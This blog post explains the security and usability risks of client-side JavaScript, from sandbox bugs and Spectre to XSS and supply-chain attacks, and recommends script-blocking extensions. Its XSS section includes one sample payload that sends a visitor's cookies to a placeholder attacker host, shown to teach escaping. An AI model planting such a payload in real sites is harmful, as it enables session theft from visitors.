Risks of client-side scripting

JavaScript logo in a cup
Image by 'Cowboy' Ben Alman / CC BY-NC-ND 2.0

The web has evolved from serving simple non-interactive HTML documents to fully branded and dynamic web applications. But what are the risks and costs of downloading and executing foreign code on your PC? Should we use this style of building websites even for blogs?

Client-side scripting vs server-side scripting

Originally, the web was built with web servers serving static HTML files. To change the content of a served document, a webmaster would upload new files to the web server, from which they were served to visitors' browsers and rendered on their screens.

This approach was very limited, and new methods of handling dynamically changing content - often built around user-submitted data (user-generated content) - were developed. The Common Gateway Interface (CGI) specification was defined to integrate custom programs (or scripts) running on the server with the web server daemon, so that the daemon could serve HTML and other media generated on the fly by the script. Later, many stand-alone HTTP application server technologies were developed; these application servers handle the HTTP protocol themselves. Applications hosted this way usually connect to an SQL database to store and retrieve data for each client request.

All of this can be called server-side scripting and is still the main way to serve dynamic content on the web.

Later, as browsers gained the ability to run server-provided scripts, a new trend emerged. With client-side scripts written in the JavaScript language, a page could become more interactive: it could fetch data on demand from the web server using an HTTP API. Single-page web applications became popular; in this model, server-side scripts only provide data to scripts running in the browser, which build the whole HTML document on the fly.
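A sketch of that pattern, with a hypothetical `/api/posts` endpoint and post shape: the server returns only JSON, and the client-side script turns it into markup.

```javascript
// Sketch of the single-page-application pattern: the server returns
// only data (JSON), and the browser script builds the markup itself.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Turn API data into an HTML fragment on the client.
function renderPostList(posts) {
  return '<ul>' + posts.map((p) => `<li>${escapeHtml(p.title)}</li>`).join('') + '</ul>';
}

// In the browser this would be driven by fetch():
// fetch('/api/posts')
//   .then((res) => res.json())
//   .then((posts) => {
//     document.querySelector('#posts').innerHTML = renderPostList(posts);
//   });
```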

Browsers grew to support many Web APIs accessible from JavaScript, turning the browser into a fully-blown operating system abstraction layer.

More recently, a new technology called WebAssembly emerged to liberate client-side scripting from JavaScript. It provides a way for many more programming languages to target the browser. By design, this technology is less resource-intensive and more secure than JavaScript, and it allows novel applications to be created for the web browser.

In this post, I would like to explore some risks and common issues arising from the widespread use of client-side scripting. I will focus on JavaScript, since most issues related to it also apply to WebAssembly.

Benefits of client-side scripting

When you visit a website, your browser may be asked by the server to download arbitrary programs and execute them on your computer. This way, the web application developer can drive your browser through interactive behaviours without the need to communicate with the server on every click. For certain types of applications, this may reduce the data transferred between your browser and the server. It may let the browser perform complex actions like drawing images or producing sounds. It can also help avoid potentially lengthy page reloads.

Another very important factor that made client-side scripting so successful is that browsers are everywhere and offer a relatively standardised programming environment compared to native operating systems. If you want to write an application that runs on Windows, Linux, Android, iOS and more, you can do it with web technologies. You don't have to worry about Apple taking 30% of your subscription revenue, Google blocking you from the Play Store, installers on Windows, or binary compatibility with Linux's glibc. People don't need to install anything; they just need the URL, which they will hopefully discover via a web search engine. All the code, media and dependencies will be downloaded by the browser automatically and transparently.

Browser as an attack target

Today, browsers are a very important tool in our daily digital lives. We use them to get informed, communicate with people, do our banking and order food. All these activities require private data to be transferred in and out of the browser, and ourselves to be authenticated via the browser to various third parties. This makes your browser a valuable target for an attacker.

Common goals of attackers are:

  • Steal session cookie values of other visitors of a website - this allows the attacker to impersonate the visitor (log in as someone else without even knowing the password!).
  • Steal your secrets, like credit card details or crypto-currency wallets, to later take your money.
  • Steal your electricity and CPU power by running crypto-currency miners for profit.
  • Access personal information to later sell it or use it in a fraud against you or your family and friends.
  • Post messages from your social media account to spread fake news in your name.
  • Create botnets to attack other targets.
  • Install backdoors, trojans and other types of malware to use later in other ways.
  • Install ransomware that will encrypt your files until a ransom is paid.
  • Deceive you into downloading and installing malicious software.
  • Hack your home router via a web request to an insecure LAN-side management interface.
  • Use browser fingerprinting techniques to track you across the internet and build a behavioural profile of you.
  • And many more...

Attack surface

Execution of arbitrary code on your computer is not without risks. Web browser designers try very hard to make sure that any script running within the browser is contained and cannot access data beyond what the browser allows. In practice, this is impossible to achieve fully.

JavaScript interpreter bugs

Every script downloaded by the browser is parsed and executed by a JavaScript virtual machine (or WebAssembly runtime environment) that is a component of the browser. These virtual machines are designed to restrict the running script from accessing arbitrary information on your computer. This is called sandboxing.

In practice, the design and implementation are not perfect. A clever trick may allow script code to access restricted information from the browser or operating system. It may even allow injecting native code to be executed as part of the normal browser runtime (Remote Code Execution). In effect, this can lead to the compromise of the whole system.

Unfortunately, every few months browser vendors have to patch their JavaScript virtual machines to fix these kinds of issues.

Because of the design of operating systems, an attacker exploiting a browser vulnerability (a zero-day, or a known flaw in an outdated browser version) can gain full access to the computer running the browser (user-level access at first, but gaining administrative access is usually possible). This includes all your information stored on the computer or reachable through it.

Hardware isolation bugs

The Meltdown and Spectre attacks were discovered more recently. These types of attacks rely on the execution of untrusted code in a shared environment. While this description fits virtual server providers (or cloud services) perfectly, it applies just as well to JavaScript running in your browser, sharing your CPU with the other programs you run and with the operating system itself.

Today we have many mitigations in place at the CPU microcode level, at the OS level, and in the browsers' JavaScript virtual machines. The problem is that these mitigations are not perfect, and researchers keep finding new ways of exploiting similar mechanisms, as used by attacks like the MDS attacks.

From a recent report: "(...) 'certain attacks' can now be mounted remotely using JavaScript in a web browser, and 'fill 64-bit registers with an attacker-controlled value in JavaScript by using WebAssembly'."

For more see: Intel, ARM, IBM, AMD Processors Vulnerable to New Side-Channel Attacks

See also: Some Spectre In-Browser Mitigations Can Be Defeated

Design issues in web standards

Web standards consist of a large volume of specifications. Sometimes their designers make mistakes, and even properly implemented standards can be abused for malicious purposes.

Malicious script delivery vectors

Even if you trust a website not to serve malicious scripts, there are many techniques an attacker can use to get their script served to you without the website owner's knowledge.

Ads and ad networks

A typical website will serve ads. An advertiser or an advertising network may serve malicious scripts through ads that are part of a website you trust. The website you are visiting is not in control of what scripts are served to your browser - it merely includes a script provided by the ad network.

See also: Ad networks owned by Google, Microsoft serve malware

Cross-site scripting

One of the top 10 classes of software vulnerabilities is cross-site scripting (XSS). With this technique, an attacker posts JavaScript to a vulnerable web server in such a way that the script is executed by visitors' browsers as part of the site's content - e.g. via a specially crafted comment in the comment section. Using this technique, the attacker can obtain any information that the script is allowed to access in the visitor's browser - often including session tokens, which allow the attacker to later impersonate the visitor on the website without knowing their login credentials.
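The vulnerability boils down to embedding untrusted text into markup without escaping it. A minimal sketch (the helper names and the attacker's URL are hypothetical):

```javascript
// Stored XSS in a nutshell: a comment is embedded into the page
// without escaping, so markup inside the comment gets executed.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`; // vulnerable
}

// Escaping turns the payload into inert text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`; // safe
}

// A crafted "comment" that would run in every visitor's browser
// and leak their session cookie to the attacker's server:
const payload = '<script>new Image().src = "https://evil.example/?c=" + document.cookie</script>';
```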

See also: Dangerous XSS vulnerability found on YouTube

XSS via web cache

Many websites use content delivery networks or their own custom caching strategies to optimize page delivery performance. Subtle inconsistencies in caching can be exploited by attackers to implant JavaScript code into cached responses. These cached responses are then served to unsuspecting visitors.

See also: Web Cache Entanglement: Novel Pathways to Poisoning

Supply chain attack

Web application developers often use hundreds of small JavaScript libraries as part of their applications. It is often not feasible for developers to inspect all of these libraries for malicious code. A successful supply chain attack can deliver malicious script code through many trusted web applications without being noticed.

See also: PCI and the return of Javascript supply chain attacks

Typosquatting

Typosquatting is another kind of supply chain attack: a developer misspells the name of a JavaScript library they use and pulls in a similarly named but malicious library instead.

See also: JavaScript Packages Caught Stealing Environment Variables

Security issues in foreign code

Even if your browser is fully patched, a script loaded into it can have security issues of its own. As with a supply chain attack, the code of a third-party dependency of the web application can introduce a weakness into the whole application without the developers knowing about it.

See also: The Curious Case of Copy & Paste.

Hacked web servers

Malicious JavaScript code can be placed on a hacked webpage in such a way that its actions are not visible to visitors or website administrators.

See also: Boing Boing was hacked

Downsides of single-page applications

Single-page applications tend to break some fundamental assumptions about how the web works for the visitor.

On a server-side generated website, navigation can be done via the browser's back button. This is often broken in web applications, and some apps will even log you out if you use it by "mistake".

Another fundamental feature that easily breaks is links. A web application often uses buttons that trigger code to run in the browser, so you cannot copy a link to the page the button leads to. Similarly, bookmarking or sharing links from the browser address bar is pointless, as the URL often stays the same no matter where you are in the app. Normally, visited links are also rendered differently, so you can see what information you have already accessed in the past; this too is lost.

Browsers try to keep scroll positions consistent as you go back and forth in history. This helps you orient yourself on a long page quickly. Unfortunately, when content is dynamically loaded, this often breaks. It is very annoying, for example, when browsing products in online shops.

These issues can be worked around with some extra code and use of the History API, but this requires extra work. With a server-side generated website, you get all of this for free.
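The workaround centres on history.pushState and the popstate event. A browser-only sketch, where renderRoute is a hypothetical app-specific function that draws the view for a given path:

```javascript
// Browser-only sketch: keep the back button and the address bar
// working in a single-page app. renderRoute() is a hypothetical
// app function that renders the view for a given path.
function setupSpaNavigation(renderRoute) {
  // Fired on back/forward: restore the view for the stored path.
  window.addEventListener('popstate', (event) => {
    renderRoute(event.state ? event.state.path : location.pathname);
  });

  // Call this instead of a full page load when the user navigates.
  return function navigateTo(path) {
    history.pushState({ path }, '', path); // adds a real history entry
    renderRoute(path);
  };
}
```

With this in place, each view gets its own URL that can be bookmarked and shared, and back/forward behave as visitors expect.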

Browsers provide accessibility features, like keyboard-based navigation. These features are crucial for people who cannot easily use pointing devices. They work out of the box for plain HTML pages but easily break with JavaScript-generated navigation elements and links.

For the web developer, on the other hand, the issues are:

  • Search engines cannot readily index your web application's content - Google will index HTML content as soon as it discovers it, but will take time to run your scripts to index JavaScript-generated content.
  • Content of your application cannot be easily archived (e.g. by archive.org).
  • JavaScript adds extra failure modes which can prevent the website from loading correctly.
  • Typically all application code needs to be downloaded before it can run which may increase the bounce rate.
  • "Generically-designed REST API that tries not to mix 'concerns' will produce a frontend application that has to make lots of requests to display a page" - forcing you to join data from multiple tables/API endpoints on the client-side, which is the worst place, performance-wise, to do it.
  • They can be a resource hog for the client where hardware specification is unpredictable.
  • Testing is harder - non-interactive websites are much easier to test.

See also: Second-guessing the modern web

Designing no-JavaScript friendly websites

Progressive fallback

Web standards are designed to allow progressive fallback from the full HTML + CSS + JS stack down to HTML only, without loss of content. Sure, your website won't look pretty stripped of CSS, but it should remain readable and functional by default... that is, unless you work to break this fallback.

This is because the HTML part of the web page is where all the content is (supposed to) be: CSS adds style to it, and JavaScript makes it interactive. So taking away the latter two should leave you with just plain content.

Build your site in such a way that it behaves reasonably well without JavaScript, and also without CSS. Doing so will help you find usability issues - not every person on the internet can actually see your website or use a mouse.

See also: CSS Naked Day.

Landing page should be usable without JavaScript

Even if you are designing a web application for which JavaScript is essential, make sure that the landing page describes what your web application is about before requiring the visitor to turn on JavaScript. Just showing the plain text "This website requires JavaScript" is not going to convince me to allow its scripts to run, but a proper description of its functions may.
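One way to do this is the noscript element, which browsers render only when scripting is disabled. A sketch, with entirely hypothetical application wording:

```html
<noscript>
  <h1>Example App</h1>
  <p>Example App lets you plan trips, share itineraries and track your
     bookings. The interactive planner requires JavaScript, but you can
     read more on the <a href="/about">about page</a>, which works
     without it.</p>
</noscript>
```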

Use native browser features

Many use cases for JavaScript are actually covered by the HTML standard these days, so you might not need JavaScript at all.
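A few examples of things that once required scripts but are now plain HTML:

```html
<!-- Collapsible section, no JavaScript needed -->
<details>
  <summary>Show advanced options</summary>
  <p>Options go here...</p>
</details>

<!-- Input validation and pickers built into the browser -->
<input type="email" required>
<input type="date">

<!-- Lazy-loaded images -->
<img src="photo.jpg" loading="lazy" alt="A photo">
```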

Browsers and extensions to help you mitigate the risk

Firefox

Mozilla has made big mistakes regarding user privacy and is far from perfect in this regard. They are also effectively sponsored by Google, despite their many attempts to break free from that monetary influence. But compared to Chrome-based browsers, Firefox has better support for content blockers. This allows extensions like uBlock Origin to block malicious scripts, including first-party trackers, more effectively than similar extensions for Chrome. Google has recently crippled the ad-blocking functionality of Chrome extensions, while Firefox gained built-in tracking protection.

Mozilla has less incentive to push for web-application-style web standards. Google, in contrast, makes money from privacy invasion; their main products are literally user-tracking related (AdSense, Analytics). They push for more use of JavaScript and web applications as a way to isolate themselves from Microsoft Windows: you start Chrome and you no longer need Windows applications, as Google has you covered within the browser. So in the long term, a Chrome that is more private and restricts JavaScript use is directly against their business.

Many browsers derive from either Firefox or Chrome. They come with their own trade-offs but may be worth looking into. Currently, I use Fennec on my de-Googled Android phone. Do your research.

uBlock Origin

The uBlock Origin browser extension not only blocks ads and trackers but also malicious scripts, like the one used for port scanning. It works well out of the box and requires little configuration. Most websites will work correctly with it enabled. I highly recommend this extension for anybody, unless you want to use more advanced tools like uMatrix.

NoScript

NoScript is a more invasive browser extension. It blocks all JavaScript by default and lets you decide whether you trust a given domain or not. This way, it offers even more protection on websites that do not need to run scripts to function. Inevitably, this will render many websites half-broken or unusable until you allow the necessary scripts to run.

uMatrix

uMatrix is an advanced browser extension that combines the features of uBlock Origin and NoScript. To use it, though, you need to know what you are doing, as the default settings are very restrictive about what requests your browser is allowed to make.

LibreJS

LibreJS is another extension that will block some JavaScript from running. "It blocks nonfree nontrivial JavaScript while allowing JavaScript that is free and/or trivial."

So if your focus is on running only free software on your computer, you may want to look into this extension.

See also: The JavaScript Trap

Life beyond HTTP

There are other ways of browsing the internet. Protocols like Gemini and Gopher are alternative universes where the risks I have described do not apply, by design.

Summary

JavaScript-based web applications are a good way to write client components for distributed software. They allow the developer to ship one client-side executable artefact that runs on all five of X11/Linux, macOS, Windows, Android and iOS. But make sure you know the trade-offs described here.

If you want to present content that is indexable, searchable, navigable and readable by default, just use plain HTML/CSS, and only use JavaScript when the browser is otherwise missing a feature that you really need.

When browsing the internet, make sure you use proper tools to stay safe, and encourage safe website designs with your choices and feedback.

Updates to this article

  • 2020-11-11 - Added note about NAT Slipstreaming